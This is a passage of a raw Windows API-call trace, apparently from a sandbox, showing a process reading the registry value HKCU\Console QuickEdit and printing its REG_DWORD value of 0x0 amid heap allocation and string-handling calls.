0x1dc8d1e90f0 [0178.276] GetProcessHeap () returned 0x1dc8d1e0000 [0178.276] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8d90 [0178.276] GetProcessHeap () returned 0x1dc8d1e0000 [0178.276] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8dc0 [0178.276] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.279] GetProcessHeap () returned 0x1dc8d1e0000 [0178.279] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e48d0 [0178.279] _memicmp (_Buf1=0x1dc8d1e48d0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.279] GetProcessHeap () returned 0x1dc8d1e0000 [0178.279] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x1e) returned 0x1dc8d1e8eb0 [0178.279] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.279] GetProcessHeap () returned 0x1dc8d1e0000 [0178.279] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e4b60 [0178.279] _memicmp (_Buf1=0x1dc8d1e4b60, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.279] GetProcessHeap () returned 0x1dc8d1e0000 [0178.279] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8ee0 [0178.279] _vsnwprintf (in: _Buffer=0x1dc8d1e8eb0, _BufferCount=0xe, _Format="|%s|", _ArgList=0xab482cf808 | out: _Buffer="|/?|-?|/h|-h|") returned 13 [0178.279] _vsnwprintf (in: _Buffer=0x1dc8d1e8ee0, _BufferCount=0xf, _Format="|%s|", _ArgList=0xab482cf808 | out: _Buffer="|HKCU\\Console|") returned 14 [0178.279] lstrlenW (lpString="|/?|-?|/h|-h|") returned 13 [0178.279] lstrlenW (lpString="|HKCU\\Console|") returned 14 [0178.279] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.279] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.280] GetProcessHeap () returned 0x1dc8d1e0000 [0178.280] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x1a) returned 0x1dc8d1e8f40 [0178.280] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0178.280] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0178.280] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.280] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Console", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0178.280] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.280] lstrlenW (lpString="HKCU\\Console") returned 12 [0178.280] StrChrIW (lpStart="HKCU\\Console", wMatch=0x5c) returned="\\Console" [0178.281] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x28) returned 0x1dc8d1e8fa0 [0178.281] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0178.281] lstrlenW (lpString="Console") returned 7 [0178.281] lstrlenW (lpString="Console") returned 7 [0178.281] lstrlenW (lpString="Console") returned 7 [0178.281] StrChrIW (lpStart="Console", wMatch=0x5c) returned 0x0 [0178.281] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.281] lstrlenW (lpString="Console") returned 7 [0178.281] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.281] lstrlenW (lpString="Console") returned 7 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x10) returned 0x1dc8d1e4b80 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x3c) returned 0x1dc8d1e47b0 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8fa0) returned 1 [0178.281] GetProcessHeap () returned 0x1dc8d1e0000 [0178.281] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8fa0) returned 0x28 [0178.282] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8fa0) returned 1 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8f40) returned 1 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8f40) returned 0x1a [0178.282] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8f40) returned 1 [0178.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 3 [0178.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-f", cchCount2=-1) returned 1 [0178.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/k", cchCount2=-1) returned 3 [0178.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-k", cchCount2=-1) returned 1 [0178.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0178.282] lstrlenW (lpString="QuickEdit") returned 9 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x14) returned 0x1dc8d1e4350 [0178.282] lstrlenW (lpString="QuickEdit") returned 9 [0178.282] lstrlenW (lpString="QuickEdit") returned 9 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8f40 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8f70 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8fa0 [0178.282] GetProcessHeap () returned 0x1dc8d1e0000 [0178.282] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8fd0 [0178.283] GetProcessHeap () returned 0x1dc8d1e0000 [0178.283] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e4370 [0178.283] _memicmp (_Buf1=0x1dc8d1e4370, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.283] GetProcessHeap () returned 0x1dc8d1e0000 [0178.283] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x26) returned 0x1dc8d1e9d10 [0178.283] GetProcessHeap () returned 0x1dc8d1e0000 [0178.283] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4350) returned 1 [0178.283] GetProcessHeap () returned 0x1dc8d1e0000 [0178.283] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4350) returned 0x14 [0178.283] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.283] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Console", ulOptions=0x0, samDesired=0x20019, phkResult=0xab482cf8d0 | out: phkResult=0xab482cf8d0*=0x7c) returned 0x0 [0178.283] __iob_func () returned 0x7ffbed90e210 [0178.283] _fileno (_File=0x7ffbed90e240) returned 1 [0178.283] _errno () returned 0x1dc8d420840 [0178.283] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.283] _errno () returned 0x1dc8d420840 [0178.283] GetFileType (hFile=0x24) returned 0x3 [0178.283] lstrlenW (lpString="\n") returned 1 [0178.283] GetConsoleOutputCP () returned 0x1b5 [0178.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.285] GetConsoleOutputCP () returned 0x1b5 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.286] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0178.286] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.286] lstrlenW (lpString="QuickEdit") returned 9 [0178.286] lstrlenW (lpString="*?") returned 2 [0178.286] lstrlenW (lpString="QuickEdit") returned 9 [0178.286] lstrlenW (lpString="QuickEdit") returned 9 [0178.286] lstrlenW (lpString="QuickEdit") returned 9 [0178.286] StrChrIW (lpStart="QuickEdit", wMatch=0x2a) returned 0x0 [0178.286] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.286] lstrlenW (lpString="QuickEdit") returned 9 [0178.286] StrChrIW (lpStart="QuickEdit", wMatch=0x3f) returned 0x0 [0178.286] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.286] RtlRestoreLastWin32Error () returned 0xab48493000 [0178.286] RegGetValueW (in: hkey=0x7c, lpSubKey=0x0, lpValue="QuickEdit", dwFlags=0xffff, pdwType=0x0, pvData=0x0, pcbData=0xab482cf8a0*=0x0 | out: pdwType=0x0, pvData=0x0, pcbData=0xab482cf8a0*=0x4) returned 0x0 [0178.286] GetProcessHeap () returned 0x1dc8d1e0000 [0178.286] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x6) returned 0x1dc8d1e4390 [0178.286] GetProcessHeap () returned 0x1dc8d1e0000 [0178.286] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4390) returned 1 [0178.286] GetProcessHeap () returned 0x1dc8d1e0000 [0178.286] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4390) returned 0x6 [0178.286] RegGetValueW (in: hkey=0x7c, lpSubKey=0x0, lpValue="QuickEdit", dwFlags=0x1000ffff, pdwType=0xab482cf820, pvData=0x1dc8d1e4390, pcbData=0xab482cf8a0*=0x4 | out: pdwType=0xab482cf820*=0x4, pvData=0x1dc8d1e4390*=0x0, pcbData=0xab482cf8a0*=0x4) returned 0x0 [0178.287] __iob_func () returned 0x7ffbed90e210 [0178.287] GetProcessHeap () returned 0x1dc8d1e0000 [0178.287] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e43b0 [0178.287] _memicmp (_Buf1=0x1dc8d1e43b0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.287] GetProcessHeap () returned 0x1dc8d1e0000 [0178.287] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x1000) returned 0x1dc8d1ea3e0 [0178.287] _vsnwprintf (in: _Buffer=0x1dc8d1ea3e0, _BufferCount=0x7ff, _Format="%s\n", _ArgList=0xab482cf800 | out: _Buffer="HKEY_CURRENT_USER\\Console\n") returned 26 [0178.287] _fileno (_File=0x7ffbed90e240) returned 1 [0178.287] _errno () returned 0x1dc8d420840 [0178.287] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.287] _errno () returned 0x1dc8d420840 [0178.287] GetFileType (hFile=0x24) returned 0x3 [0178.287] lstrlenW (lpString="HKEY_CURRENT_USER\\Console\n") returned 26 [0178.287] GetConsoleOutputCP () returned 0x1b5 [0178.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Console\n", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0178.288] GetConsoleOutputCP () returned 0x1b5 [0178.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Console\n", cchWideChar=26, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_CURRENT_USER\\Console\n", lpUsedDefaultChar=0x0) returned 26 [0178.295] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 26 [0178.295] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.296] __iob_func () returned 0x7ffbed90e210 [0178.296] _memicmp (_Buf1=0x1dc8d1e43b0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.296] _vsnwprintf (in: _Buffer=0x1dc8d1ea3e0, _BufferCount=0x7ff, _Format="%*s", _ArgList=0xab482cf7b0 | out: _Buffer=" ") returned 4 [0178.296] _fileno (_File=0x7ffbed90e240) returned 1 [0178.296] _errno () returned 0x1dc8d420840 [0178.296] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.296] _errno () returned 0x1dc8d420840 [0178.296] GetFileType (hFile=0x24) returned 0x3 [0178.296] lstrlenW (lpString=" ") returned 4 [0178.296] GetConsoleOutputCP () returned 0x1b5 [0178.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0178.298] GetConsoleOutputCP () returned 0x1b5 [0178.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0178.302] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0178.302] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.303] lstrlenW (lpString="QuickEdit") returned 9 [0178.303] __iob_func () returned 0x7ffbed90e210 [0178.303] _fileno (_File=0x7ffbed90e240) returned 1 [0178.303] _errno () returned 0x1dc8d420840 [0178.303] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.303] _errno () returned 0x1dc8d420840 [0178.303] GetFileType (hFile=0x24) returned 0x3 [0178.303] lstrlenW (lpString="QuickEdit") returned 9 [0178.303] GetConsoleOutputCP () returned 0x1b5 [0178.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="QuickEdit", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.304] GetConsoleOutputCP () returned 0x1b5 [0178.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="QuickEdit", cchWideChar=9, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickEdit", lpUsedDefaultChar=0x0) returned 9 [0178.304] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 9 [0178.304] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.304] __iob_func () returned 0x7ffbed90e210 [0178.304] _fileno (_File=0x7ffbed90e240) returned 1 [0178.304] _errno () returned 0x1dc8d420840 [0178.304] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.304] _errno () returned 0x1dc8d420840 [0178.304] GetFileType (hFile=0x24) returned 0x3 [0178.304] lstrlenW (lpString=" ") returned 4 [0178.305] GetConsoleOutputCP () returned 0x1b5 [0178.305] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0178.305] GetConsoleOutputCP () returned 0x1b5 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0178.306] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0178.306] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.306] __iob_func () returned 0x7ffbed90e210 [0178.306] _fileno (_File=0x7ffbed90e240) returned 1 [0178.306] _errno () returned 0x1dc8d420840 [0178.306] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.306] _errno () returned 0x1dc8d420840 [0178.306] GetFileType (hFile=0x24) returned 0x3 [0178.306] lstrlenW (lpString="REG_DWORD") returned 9 [0178.306] GetConsoleOutputCP () returned 0x1b5 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.307] GetConsoleOutputCP () returned 0x1b5 [0178.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=9, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 9 [0178.307] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 9 [0178.307] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.307] __iob_func () returned 0x7ffbed90e210 [0178.307] _fileno (_File=0x7ffbed90e240) returned 1 [0178.307] _errno () returned 0x1dc8d420840 [0178.307] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.307] _errno () returned 0x1dc8d420840 [0178.307] GetFileType (hFile=0x24) returned 0x3 [0178.307] lstrlenW (lpString=" ") returned 4 [0178.307] GetConsoleOutputCP () returned 0x1b5 [0178.308] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0178.308] GetConsoleOutputCP () returned 0x1b5 [0178.308] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0178.308] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0178.308] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.309] __iob_func () returned 0x7ffbed90e210 [0178.309] _memicmp (_Buf1=0x1dc8d1e43b0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0178.309] _vsnwprintf (in: _Buffer=0x1dc8d1ea3e0, _BufferCount=0x7ff, _Format="0x%x", _ArgList=0xab482cf7b0 | out: _Buffer="0x0") returned 3 [0178.309] _fileno (_File=0x7ffbed90e240) returned 1 [0178.309] _errno () returned 0x1dc8d420840 [0178.309] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.309] _errno () returned 0x1dc8d420840 [0178.309] GetFileType (hFile=0x24) returned 0x3 [0178.309] lstrlenW (lpString="0x0") returned 3 [0178.309] GetConsoleOutputCP () returned 0x1b5 [0178.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="0x0", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0178.310] GetConsoleOutputCP () returned 0x1b5 [0178.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="0x0", cchWideChar=3, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0x0", lpUsedDefaultChar=0x0) returned 3 [0178.310] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 3 [0178.310] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.310] __iob_func () returned 0x7ffbed90e210 [0178.310] _fileno (_File=0x7ffbed90e240) returned 1 [0178.310] _errno () returned 0x1dc8d420840 [0178.310] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.310] _errno () returned 0x1dc8d420840 [0178.310] GetFileType (hFile=0x24) returned 0x3 [0178.310] lstrlenW (lpString="\n") returned 1 [0178.311] GetConsoleOutputCP () returned 0x1b5 [0178.311] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.311] GetConsoleOutputCP () returned 0x1b5 [0178.312] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.312] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0178.312] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.313] GetProcessHeap () returned 0x1dc8d1e0000 [0178.313] GetProcessHeap () returned 0x1dc8d1e0000 [0178.313] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4390) returned 1 [0178.313] GetProcessHeap () returned 0x1dc8d1e0000 [0178.313] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4390) returned 0x6 [0178.313] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4390) returned 1 [0178.313] __iob_func () returned 0x7ffbed90e210 [0178.313] _fileno (_File=0x7ffbed90e240) returned 1 [0178.313] _errno () returned 0x1dc8d420840 [0178.314] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.314] _errno () returned 0x1dc8d420840 [0178.314] GetFileType (hFile=0x24) returned 0x3 [0178.314] lstrlenW (lpString="\n") returned 1 [0178.314] GetConsoleOutputCP () returned 0x1b5 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.314] GetConsoleOutputCP () returned 0x1b5 [0178.315] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.315] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0178.315] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.315] RegCloseKey (hKey=0x7c) returned 0x0 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e9d10) returned 1 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e9d10) returned 0x26 [0178.316] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e9d10) returned 1 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4370) returned 1 [0178.316] GetProcessHeap () returned 0x1dc8d1e0000 [0178.316] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4370) returned 0x18 [0178.317] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4370) returned 1 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8fd0) returned 1 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8fd0) returned 0x20 [0178.317] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8fd0) returned 1 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1ea3e0) returned 1 [0178.317] GetProcessHeap () returned 0x1dc8d1e0000 [0178.317] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1ea3e0) returned 0x1000 [0178.318] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1ea3e0) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e43b0) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e43b0) returned 0x18 [0178.318] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e43b0) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8f40) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, 